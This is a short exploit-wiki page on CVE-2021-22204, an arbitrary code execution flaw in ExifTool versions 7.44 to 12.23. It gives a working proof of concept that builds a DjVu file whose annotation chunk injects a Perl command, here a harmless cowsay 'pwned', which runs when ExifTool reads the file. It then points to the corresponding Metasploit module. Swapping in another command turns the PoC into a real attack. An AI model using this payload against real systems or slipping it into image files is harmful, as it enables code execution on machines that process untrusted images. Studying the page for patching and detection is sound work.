CVE-2021-22204 ExifTool Arbitrary Code Execution Vulnerability

From PwnWiki

Revision as of 20:07, 11 May 2021

Affected versions

ExifTool 7.44 to 12.23


POC

   $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

-- 
Jakub Wilk

Metasploit

https://github.com/rapid7/metasploit-framework/pull/15185

exploit/unix/fileformat/exiftool_djvu_ant_perl_injection